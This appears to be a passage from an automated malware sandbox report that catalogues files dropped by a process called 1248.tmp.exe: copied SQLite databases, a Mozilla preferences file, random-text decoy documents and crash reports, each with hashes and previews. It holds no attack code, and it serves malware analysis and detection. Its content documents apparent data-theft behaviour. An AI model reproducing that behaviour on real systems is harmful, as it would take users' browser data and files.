                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 7, database pages 5, cookie 0x5, schema 4, UTF-8, version-valid-for 7
                                                                                                                                  Category:dropped
                                                                                                                                  Size (bytes):20480
                                                                                                                                  Entropy (8bit):0.6732424250451717
                                                                                                                                  Encrypted:false
                                                                                                                                  SSDEEP:24:TLO1nKbXYFpFNYcoqT1kwE6UwpQ9YHVXxZ6HfB:Tq1KLopF+SawLUO1Xj8B
                                                                                                                                  MD5:CFFF4E2B77FC5A18AB6323AF9BF95339
                                                                                                                                  SHA1:3AA2C2115A8EB4516049600E8832E9BFFE0C2412
                                                                                                                                  SHA-256:EC8B67EF7331A87086A6CC085B085A6B7FFFD325E1B3C90BD3B9B1B119F696AE
                                                                                                                                  SHA-512:0BFDC8D28D09558AA97F4235728AD656FE9F6F2C61DDA2D09B416F89AB60038537B7513B070B907E57032A68B9717F03575DB6778B68386254C8157559A3F1BC
                                                                                                                                  Malicious:false
                                                                                                                                  Preview:SQLite format 3......@ ..........................................................................j...$......g..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                  C:\ProgramData\ECBAEBGHDAECBGDGCAKE

                                                                                                                                  Download File
                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\1248.tmp.exe
                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                                                                  Category:dropped
                                                                                                                                  Size (bytes):40960
                                                                                                                                  Entropy (8bit):0.8553638852307782
                                                                                                                                  Encrypted:false
                                                                                                                                  SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                                                                  MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                                                                  SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                                                                  SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                                                                  SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                                                                  Malicious:false
                                                                                                                                  Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                  C:\ProgramData\ECFCBFBG

                                                                                                                                  Download File
                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\1248.tmp.exe
                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                                                                  Category:dropped
                                                                                                                                  Size (bytes):106496
                                                                                                                                  Entropy (8bit):1.136413900497188
                                                                                                                                  Encrypted:false
                                                                                                                                  SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6cV/04:MnlyfnGtxnfVuSVumEHV84
                                                                                                                                  MD5:429F49156428FD53EB06FC82088FD324
                                                                                                                                  SHA1:560E48154B4611838CD4E9DF4C14D0F9840F06AF
                                                                                                                                  SHA-256:9899B501723B97F6943D8FE6ABF06F7FE013B10A17F566BF8EFBF8DCB5C8BFAF
                                                                                                                                  SHA-512:1D76E844749C4B9566B542ACC49ED07FA844E2AD918393D56C011D430A3676FA5B15B311385F5DA9DD24443ABF06277908618A75664E878F369F68BEBE4CE52F
                                                                                                                                  Malicious:false
                                                                                                                                  Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                  C:\ProgramData\FACWLRWHGG.xlsx

                                                                                                                                  Download File
                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\1248.tmp.exe
                                                                                                                                  File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                  Category:dropped
                                                                                                                                  Size (bytes):1026
                                                                                                                                  Entropy (8bit):4.697648179966054
                                                                                                                                  Encrypted:false
                                                                                                                                  SSDEEP:24:7/Q+t6r35NjtdGQB2dOAzD/GKwLon05avvk5byZGOQz2DfwAo+O:7oW6Xjt062d6LonB05+Vjf/o+O
                                                                                                                                  MD5:2B743B2063E25195104B0EB24000FB09
                                                                                                                                  SHA1:4BBE8DC0F1389A8C2082A1A102960A6DFA417E3D
                                                                                                                                  SHA-256:6BADB679FA8F658AD5B4BCFA108CE3CB4B16267EC34D0FDA395E0FDE077D6A35
                                                                                                                                  SHA-512:BFEA76E052B182E0FF523B5CFECBEDF46C5ED526779A92A23CFD0E0395DCD144EDA9950D01BEA17543625355701A248DB7C0873AC0998C7E30FE67ACD88BEE4D
                                                                                                                                  Malicious:false
                                                                                                                                  Preview:FACWLRWHGGUTKNRRDSQUQMZCBEYWHIGWQWDXAGWJENXOZWOWCCXESYMPIJTGQXPROJMVQPSXGHSYMONETHUFZZZWYBNNWDANRHNFGNMAPXCFFQQDTCIMRCOHAFIBMTZBZPXSMFDYHLCTPITIFTXZUDBYTJZHJKELKYLZQHQZYMSBYEFXYIVGTQEWIVDJIQTEZWNDCOSWOXEYAPNQABIDGYTDJVUKMXYENQOXDATDTJVPVZZMHBTMCEKAZAPACJJWDWTDMDDUOUKVMXWLWQJIUBISHPDQERGKUJVZNEQXZLZLPAAWAIISWMNZUCNHVPXDFUMDEQXILTXQAJMAARGKYBBBICJHNOFJVCGSQMBWXMQELPZMSXWNWZOHIKTQHSNOOEOBJZYHKSWSISVNUCPTNDKLJPXFFKNAZWAKYWAQWKPWLPQBKZJOKHWXUBBXWKQFWXTNIZFYWIGTLBHZHKFRJPDBJYRQPQBTZUQVURGNTQJTFZCFBTOGNCSXOZYULXOKVYONRQOTNOMUPVCDBYIRPNYZSLKSNBOWQKKNJMJHNRUWBXYJGSZSPXSONGCMHTNOICXWNYGZZSXUAIERVNFFQNXDQVRWFMTTMSSSOBHILBUKCDGSMNJBQTRQLBDQKVRGXKWZVMFALQRGBPLMGEORKLBYALNGJAXLKGBFGJJGJRUDKBMQEFJXXWMAJRDTIEDANEPUIJCTTDZYEQDJPJIWYDQDRTRUDDZSJLFZYIHKHRWEGVLQCYQAPXOIJCBELZDZEOFPKSIJQMAQMSMXBREQEEHWXGMHEUPNGVSDZAPNVXQJCPLULFQIXRMSFCUNHHUFFJVFNQWNUUXSOMSNJWOYNUHTHGAZSWYOKIKISIGFZEGFZHQIREUWAJLPABARUVHOGZWCJTJIKKPAQXNJIPQCFVNQOWRXDIFVHURRRNGLTJZAUJLDZUVLHLMXGCRXOISIAINZBFTCEVMHTOSDRBUXYFVYIYXOYHKTGTSHIRYW

                                                                                                                                  C:\ProgramData\FCAFIJJJKEGIECAKKEHI

                                                                                                                                  Download File
                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\1248.tmp.exe
                                                                                                                                  File Type:ASCII text, with very long lines (1743), with CRLF line terminators
                                                                                                                                  Category:dropped
                                                                                                                                  Size (bytes):9504
                                                                                                                                  Entropy (8bit):5.512408163813622
                                                                                                                                  Encrypted:false
                                                                                                                                  SSDEEP:192:nnPOeRnWYbBp6RJ0aX+H6SEXKxkHWNBw8D4Sl:PeegJUaJHEw90
                                                                                                                                  MD5:1191AEB8EAFD5B2D5C29DF9B62C45278
                                                                                                                                  SHA1:584A8B78810AEE6008839EF3F1AC21FD5435B990
                                                                                                                                  SHA-256:0BF10710C381F5FCF42F9006D252E6CAFD2F18840865804EA93DAA06658F409A
                                                                                                                                  SHA-512:86FF4292BF8B6433703E4E650B6A4BF12BC203EF4BBBB2BC0EEEA8A3E6CC1967ABF486EEDCE80704D1023C15487CC34B6B319421D73E033D950DBB1724ABADD5
                                                                                                                                  Malicious:false
                                                                                                                                  Preview:// Mozilla User Preferences....// DO NOT EDIT THIS FILE...//..// If you make changes to this file while the application is running,..// the changes will be overwritten when the application exits...//..// To change a preference value, you can either:..// - modify it via the UI (e.g. via about:config in the browser); or..// - set it within a user.js file in your profile.....user_pref("app.normandy.first_run", false);..user_pref("app.normandy.migrationsApplied", 12);..user_pref("app.normandy.user_id", "9e34c6e7-cbed-40a0-ba63-35488e171013");..user_pref("app.update.auto.migrated", true);..user_pref("app.update.background.rolledout", true);..user_pref("app.update.lastUpdateTime.browser-cleanup-thumbnails", 0);..user_pref("app.update.lastUpdateTime.recipe-client-addon-run", 1696426836);..user_pref("app.update.lastUpdateTime.region-update-timer", 0);..user_pref("app.update.lastUpdateTime.rs-experiment-loader-timer", 1696426837);..user_pref("app.update.lastUpdateTime.xpi-signature-verification

                                                                                                                                  C:\ProgramData\FCGCFCAFIIEBGCBFCAKKJKJJKK

                                                                                                                                  Download File
                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\1248.tmp.exe
                                                                                                                                  File Type:SQLite 3.x database, user version 75, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 2, database pages 46, cookie 0x26, schema 4, UTF-8, version-valid-for 2
                                                                                                                                  Category:dropped
                                                                                                                                  Size (bytes):5242880
                                                                                                                                  Entropy (8bit):0.03859996294213402
                                                                                                                                  Encrypted:false
                                                                                                                                  SSDEEP:192:58rJQaXoMXp0VW9FxWHxDSjENbx56p3DisuwAyHI:58r54w0VW3xWdkEFxcp3y/y
                                                                                                                                  MD5:D2A38A463B7925FE3ABE31ECCCE66ACA
                                                                                                                                  SHA1:A1824888F9E086439B287DEA497F660F3AA4B397
                                                                                                                                  SHA-256:474361353F00E89A9ECB246EC4662682392EBAF4F2A4BE9ABB68BBEBE33FA4A0
                                                                                                                                  SHA-512:62DB46A530D952568EFBFF7796106E860D07754530B724E0392862EF76FDF99043DA9538EC0044323C814DF59802C3BB55454D591362CB9B6E39947D11E981F7
                                                                                                                                  Malicious:false
                                                                                                                                  Preview:SQLite format 3......@ ...................&...................K..................................j.....-a>.~...|0{dz.z.z"y.y3x.xKw.v.u.uGt.t;sAs.q.p.q.p{o.ohn.nem.n,m9l.k.lPj.j.h.h.g.d.c.c6b.b.a.a>..................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                  C:\ProgramData\JEGHDAFIDGDAAKEBFHDA

                                                                                                                                  Download File
                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\1248.tmp.exe
                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 25, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                                                                                                  Category:dropped
                                                                                                                                  Size (bytes):51200
                                                                                                                                  Entropy (8bit):0.8746135976761988
                                                                                                                                  Encrypted:false
                                                                                                                                  SSDEEP:96:O8mmwLCn8MouB6wzFlOqUvJKLReZff44EK:O8yLG7IwRWf4
                                                                                                                                  MD5:9E68EA772705B5EC0C83C2A97BB26324
                                                                                                                                  SHA1:243128040256A9112CEAC269D56AD6B21061FF80
                                                                                                                                  SHA-256:17006E475332B22DB7B337F1CBBA285B3D9D0222FD06809AA8658A8F0E9D96EF
                                                                                                                                  SHA-512:312484208DC1C35F87629520FD6749B9DDB7D224E802D0420211A7535D911EC1FA0115DC32D8D1C2151CF05D5E15BBECC4BCE58955CFFDE2D6D5216E5F8F3BDF
                                                                                                                                  Malicious:false
                                                                                                                                  Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                  C:\ProgramData\KATAXZVCPS.docx

                                                                                                                                  Download File
                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\1248.tmp.exe
                                                                                                                                  File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                  Category:dropped
                                                                                                                                  Size (bytes):1026
                                                                                                                                  Entropy (8bit):4.699548026888946
                                                                                                                                  Encrypted:false
                                                                                                                                  SSDEEP:24:pjU7tPjIpNf9XSXm/5eskkSAjuenNF0hE6mHPISZMqEv:pjU7xIpfXSipuenT0hvYIV
                                                                                                                                  MD5:A0DC32426FC8BF469784A49B3D092ADC
                                                                                                                                  SHA1:0C0EEB9B226B1B19A509D9864F8ADC521BF18350
                                                                                                                                  SHA-256:A381579322A3055F468E57EA1980A523CAF16ABFE5A09B46EC709E854E67AA01
                                                                                                                                  SHA-512:DAF85E375438A2A6CC261D75D672A9C43E80E6CB1BC1EAA1BDB7B798CDE22AEFD5A04AC1D10E6F24CDBB7F9EA0452F5CA790969C750B764B4B7F9E0C5B2A0731
                                                                                                                                  Malicious:false
                                                                                                                                  Preview:KATAXZVCPSXDNCRGTIEAHLTBMQUFAYSWEMLQOMHMIKPDECBCOYPMSTTHHPDKZNGFGWCNUUGIGXPEBWCPRKDGBOWPSNMTFYIHVYITPQGJYFOAJMWVQDHVSMYHPXFGNOURBBIVVVMRPWBBLQXUCAXUFAYRSTCKWXAAMKJJZILVYZNBPSMXAGXZDASFVGKBTHNGETLQIHPRIVPIVHVCSRDUBEGENZMHSYQLROJPZILEYZIFDADQNRGHABZNQMPQMEVKVERETAQUHUXWKYTSUKUXMTSIPUXJRNZOLPGLRSFBCHYWGMRDPLBUIIFHFUNFWRALBUPZLDJUHIMNWKMISYIKAQGSLGBWBFUXASKUFXDTLJAXOSBBQTQJNJAVJQLQEFEKRWWXRJNJSWYQQKPEAVJRUZGKJUAZLPHMOTXLNXAZINYPNPZNGRMVYVCYPPHKTYJCBWNURXFTCITKLDRSFMIHFZHIDPGLOTHCQFZZEHIEXWNNZRJQLWYMVUHTXHFFDTYBHDRBRNTPLBXPVFCUVAJOYOWRENFUXTSCNCCQJOSITCFTGJHFQCYISKUAVSRYASWVJRDNOYYCSYOZWHRPNSBWMHUUEYUGOXVSYKLFZAUQJZDVBEBHHGXQHZVJWNUGLSAYWIEHAJCPIOHOPCXKNVRISBGUAEMSYEGNPQXITRIIMXOLIJYUBIEQGZQUAHRWMKQHCRHKBJZQQXFYTNBHEJEWRPZRXZCXRJQVIUOATJAEYDILREREDIWFEMISEKZWNCDTIPTTOZXOZJIYMGKYIKXBLURVWBJHYFJCLGVVIMADULTTVZIOEIPMVJAOPSQCDFMYPSPGLBIQXTWTUZERGBDTCIRRVRTNGENXXRTHESXQFUQSRGUQDQWGTGXTSGDYWIQVOKABAIAJIEUVYCZXNYVKPRREMYAVDFDHWOGEKALUPBHOHENIHLFJZAHVTJIQJBKXOYIOELCIIECJBPTTASBEKGOESRDFBACPOTNMRZOG

                                                                                                                                  C:\ProgramData\KATAXZVCPS.xlsx

                                                                                                                                  Download File
                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\1248.tmp.exe
                                                                                                                                  File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                  Category:dropped
                                                                                                                                  Size (bytes):1026
                                                                                                                                  Entropy (8bit):4.699548026888946
                                                                                                                                  Encrypted:false
                                                                                                                                  SSDEEP:24:pjU7tPjIpNf9XSXm/5eskkSAjuenNF0hE6mHPISZMqEv:pjU7xIpfXSipuenT0hvYIV
                                                                                                                                  MD5:A0DC32426FC8BF469784A49B3D092ADC
                                                                                                                                  SHA1:0C0EEB9B226B1B19A509D9864F8ADC521BF18350
                                                                                                                                  SHA-256:A381579322A3055F468E57EA1980A523CAF16ABFE5A09B46EC709E854E67AA01
                                                                                                                                  SHA-512:DAF85E375438A2A6CC261D75D672A9C43E80E6CB1BC1EAA1BDB7B798CDE22AEFD5A04AC1D10E6F24CDBB7F9EA0452F5CA790969C750B764B4B7F9E0C5B2A0731
                                                                                                                                  Malicious:false
                                                                                                                                  Preview:KATAXZVCPSXDNCRGTIEAHLTBMQUFAYSWEMLQOMHMIKPDECBCOYPMSTTHHPDKZNGFGWCNUUGIGXPEBWCPRKDGBOWPSNMTFYIHVYITPQGJYFOAJMWVQDHVSMYHPXFGNOURBBIVVVMRPWBBLQXUCAXUFAYRSTCKWXAAMKJJZILVYZNBPSMXAGXZDASFVGKBTHNGETLQIHPRIVPIVHVCSRDUBEGENZMHSYQLROJPZILEYZIFDADQNRGHABZNQMPQMEVKVERETAQUHUXWKYTSUKUXMTSIPUXJRNZOLPGLRSFBCHYWGMRDPLBUIIFHFUNFWRALBUPZLDJUHIMNWKMISYIKAQGSLGBWBFUXASKUFXDTLJAXOSBBQTQJNJAVJQLQEFEKRWWXRJNJSWYQQKPEAVJRUZGKJUAZLPHMOTXLNXAZINYPNPZNGRMVYVCYPPHKTYJCBWNURXFTCITKLDRSFMIHFZHIDPGLOTHCQFZZEHIEXWNNZRJQLWYMVUHTXHFFDTYBHDRBRNTPLBXPVFCUVAJOYOWRENFUXTSCNCCQJOSITCFTGJHFQCYISKUAVSRYASWVJRDNOYYCSYOZWHRPNSBWMHUUEYUGOXVSYKLFZAUQJZDVBEBHHGXQHZVJWNUGLSAYWIEHAJCPIOHOPCXKNVRISBGUAEMSYEGNPQXITRIIMXOLIJYUBIEQGZQUAHRWMKQHCRHKBJZQQXFYTNBHEJEWRPZRXZCXRJQVIUOATJAEYDILREREDIWFEMISEKZWNCDTIPTTOZXOZJIYMGKYIKXBLURVWBJHYFJCLGVVIMADULTTVZIOEIPMVJAOPSQCDFMYPSPGLBIQXTWTUZERGBDTCIRRVRTNGENXXRTHESXQFUQSRGUQDQWGTGXTSGDYWIQVOKABAIAJIEUVYCZXNYVKPRREMYAVDFDHWOGEKALUPBHOHENIHLFJZAHVTJIQJBKXOYIOELCIIECJBPTTASBEKGOESRDFBACPOTNMRZOG

                                                                                                                                  C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_1248.tmp.exe_1f28757f917adfc1c8aed34c13f27d652ab1ba74_77f415ec_f5d51f43-6f06-4b9b-b463-b35f79fbbb51\Report.wer

                                                                                                                                  Download File
                                                                                                                                  Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                  File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                  Category:dropped
                                                                                                                                  Size (bytes):65536
                                                                                                                                  Entropy (8bit):1.0582394394718664
                                                                                                                                  Encrypted:false
                                                                                                                                  SSDEEP:192:HNQZ10zvb/JseuajsqZrP2HVLzuiFlZ24IO8s:HNWWzvb/yeuajlyLzuiFlY4IO8s
                                                                                                                                  MD5:8F87AF0A472C377B14C9519A3EEB833C
                                                                                                                                  SHA1:9FFC45AE2E29DB6C86538AE6E73FEA6E721E0607
                                                                                                                                  SHA-256:EB9A1ECA5770B900EE5BB3DF0F1FB528615DE9409F9D7A3932E8FE9500567C51
                                                                                                                                  SHA-512:2B2C62EB966F825168294B17779209702C9D83059D6AC49321CED8351081847FBCB5F9F78CC02B1FF3ABEDFEFDF505F4CEB77F6B71035F851728DCF9A74EA87A
                                                                                                                                  Malicious:true
                                                                                                                                  Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.B.E.X.....E.v.e.n.t.T.i.m.e.=.1.3.3.7.3.0.1.8.9.5.4.8.5.5.1.3.6.0.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.f.5.d.5.1.f.4.3.-.6.f.0.6.-.4.b.9.b.-.b.4.6.3.-.b.3.5.f.7.9.f.b.b.b.5.1.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.0.7.c.0.7.2.a.5.-.1.a.0.e.-.4.1.9.8.-.9.c.2.e.-.2.0.8.6.9.9.6.d.d.0.1.1.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.1.2.4.8...t.m.p...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.7.8.4.-.0.0.0.1.-.0.0.1.4.-.7.e.b.a.-.1.a.0.8.e.6.1.a.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.6.9.1.a.0.a.4.a.d.6.b.6.9.9.d.e.3.b.6.1.c.a.3.8.9.6.4.4.8.b.f.8.0.0.0.0.f.f.f.f.!.0.0.0.0.7.2.f.1.a.2.4.5.1.2.1.2.e.d.1.f.9.0.3.5.0.9.a.e.5.2.6.9.c.2.9.f.6.c.8.a.0.4.7.0.!.1.2.4.8...t.m.p...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.r.=.2.0.2.4././.1.0././.1.0.:.0.6.:.0.8.:.2.5.!.0.!.1.2.4.8...t.m.p...e.x.e.....B.o.o.t.I.d.=.4.2.9.4.9.6.7.2.9.5.....

                                                                                                                                  C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_1248.tmp.exe_4e39193d21819bd6b87cb2ff431f9e213f49d70_77f415ec_136131a7-659e-44ce-9bdb-2394595556b2\Report.wer

                                                                                                                                  Download File
                                                                                                                                  Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                  File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                  Category:dropped
                                                                                                                                  Size (bytes):65536
                                                                                                                                  Entropy (8bit):0.9185523786945382
                                                                                                                                  Encrypted:false
                                                                                                                                  SSDEEP:96:UF6w0XNTZsdh+oA7Rh6tQXIDcQnc6rCcEhcw3rD+HbHg/wWGTf3hOycaGHh4vXNz:8MNTZP056rYjsqZrP2PzuiFlZ24IO8s
                                                                                                                                  MD5:1141A4CEB60B7F5A9E11F9E2DDFD48DE
                                                                                                                                  SHA1:D8FD8FA918B85935C0F8B95BC199559997EEABCA
                                                                                                                                  SHA-256:A0526B1909446A1F6A9BC5B07F7719D5AB83921955E28DEE12C9E0CDDEE3F4F9
                                                                                                                                  SHA-512:B79290FA7DD32C6E4772DE06AAF8160066D942D5E4F113743BDBB1CAD4ED1EC828775167C7502673D0FE7ED732750F5D6F020B77BA3479676220FE887DEA1783
                                                                                                                                  Malicious:true
                                                                                                                                  Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.B.E.X.....E.v.e.n.t.T.i.m.e.=.1.3.3.7.3.0.1.8.9.3.2.2.5.5.5.1.2.2.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.1.3.6.1.3.1.a.7.-.6.5.9.e.-.4.4.c.e.-.9.b.d.b.-.2.3.9.4.5.9.5.5.5.6.b.2.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.c.4.a.9.7.1.6.a.-.0.2.8.f.-.4.9.5.d.-.a.a.a.2.-.4.2.4.5.3.a.f.6.6.3.0.d.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.1.2.4.8...t.m.p...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.7.8.4.-.0.0.0.1.-.0.0.1.4.-.7.e.b.a.-.1.a.0.8.e.6.1.a.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.6.9.1.a.0.a.4.a.d.6.b.6.9.9.d.e.3.b.6.1.c.a.3.8.9.6.4.4.8.b.f.8.0.0.0.0.f.f.f.f.!.0.0.0.0.7.2.f.1.a.2.4.5.1.2.1.2.e.d.1.f.9.0.3.5.0.9.a.e.5.2.6.9.c.2.9.f.6.c.8.a.0.4.7.0.!.1.2.4.8...t.m.p...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.r.=.2.0.2.4././.1.0././.1.0.:.0.6.:.0.8.:.2.5.!.0.!.1.2.4.8...t.m.p...e.x.e.....B.o.o.t.I.d.=.4.2.9.4.9.6.7.2.9.5.....

                                                                                                                                  C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_1248.tmp.exe_4e39193d21819bd6b87cb2ff431f9e213f49d70_77f415ec_16792952-1053-4a7f-9cde-5cefa35ec46f\Report.wer

                                                                                                                                  Download File
                                                                                                                                  Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                  File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                  Category:dropped
                                                                                                                                  Size (bytes):65536
                                                                                                                                  Entropy (8bit):0.8967564632495681
                                                                                                                                  Encrypted:false
                                                                                                                                  SSDEEP:96:PZHWw0XNMZsdh+oA7Rh6tQXIDcQnc6rCcEhcw3rD+HbHg/wWGTf3hOycaGHh4vXc:B4NMZP056rYjsqZrP2ozuiFlZ24IO8s
                                                                                                                                  MD5:E8552D8A6E6B20F828BBDEC41D6243B2
                                                                                                                                  SHA1:6B071D2E32224C712A6E7D128536C08940667A87
                                                                                                                                  SHA-256:64E98C4F3FF9C34FC3BE38B00D42EEF6195423E33213C034A1CE3711F17DE632
                                                                                                                                  SHA-512:EDE5692807499A0E40ADB4BDF2AAB1B4E964F678216024B8CC9B2C2CB6F009F4756FFDB36A1735FD8481C64AA691F2739CA6FD812F7DC1A4DCE834FD9D6B3223
                                                                                                                                  Malicious:true
                                                                                                                                  Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.B.E.X.....E.v.e.n.t.T.i.m.e.=.1.3.3.7.3.0.1.8.9.3.0.5.1.2.0.6.0.7.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.1.6.7.9.2.9.5.2.-.1.0.5.3.-.4.a.7.f.-.9.c.d.e.-.5.c.e.f.a.3.5.e.c.4.6.f.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.7.9.a.0.4.8.3.0.-.d.7.f.9.-.4.6.8.c.-.8.4.3.b.-.7.e.3.b.e.2.1.c.c.e.c.a.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.1.2.4.8...t.m.p...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.7.8.4.-.0.0.0.1.-.0.0.1.4.-.7.e.b.a.-.1.a.0.8.e.6.1.a.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.6.9.1.a.0.a.4.a.d.6.b.6.9.9.d.e.3.b.6.1.c.a.3.8.9.6.4.4.8.b.f.8.0.0.0.0.f.f.f.f.!.0.0.0.0.7.2.f.1.a.2.4.5.1.2.1.2.e.d.1.f.9.0.3.5.0.9.a.e.5.2.6.9.c.2.9.f.6.c.8.a.0.4.7.0.!.1.2.4.8...t.m.p...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.r.=.2.0.2.4././.1.0././.1.0.:.0.6.:.0.8.:.2.5.!.0.!.1.2.4.8...t.m.p...e.x.e.....B.o.o.t.I.d.=.4.2.9.4.9.6.7.2.9.5.....

                                                                                                                                  C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_1248.tmp.exe_4e39193d21819bd6b87cb2ff431f9e213f49d70_77f415ec_239c737a-fe90-4848-b65f-6f08a1c0b759\Report.wer

                                                                                                                                  Download File
                                                                                                                                  Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                  File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                  Category:dropped
                                                                                                                                  Size (bytes):65536
                                                                                                                                  Entropy (8bit):0.897043180203251
                                                                                                                                  Encrypted:false
                                                                                                                                  SSDEEP:192:DxNG+ZP056rYjsqZrP2ozuiFlZ24IO8s:dNG4856rYjlvzuiFlY4IO8s
                                                                                                                                  MD5:8707851CB4F7AF6F3E2D0930B78A4D4F
                                                                                                                                  SHA1:C014791F1E18337F2726E5538EFC75BEF40C633A
                                                                                                                                  SHA-256:AF243049957E85BC69EF01AF4BA0864BF63001FC59835B40428AD82E1C369F9E
                                                                                                                                  SHA-512:DA7FD792AD598324525C512FD5A6882B6E4DA2014B1ADF0EC9C6108BCBE088E1505C67B6CD44108464754B1EAB01BA69D9E81BD5206791BDFAB73ABAF748CC8C
                                                                                                                                  Malicious:true
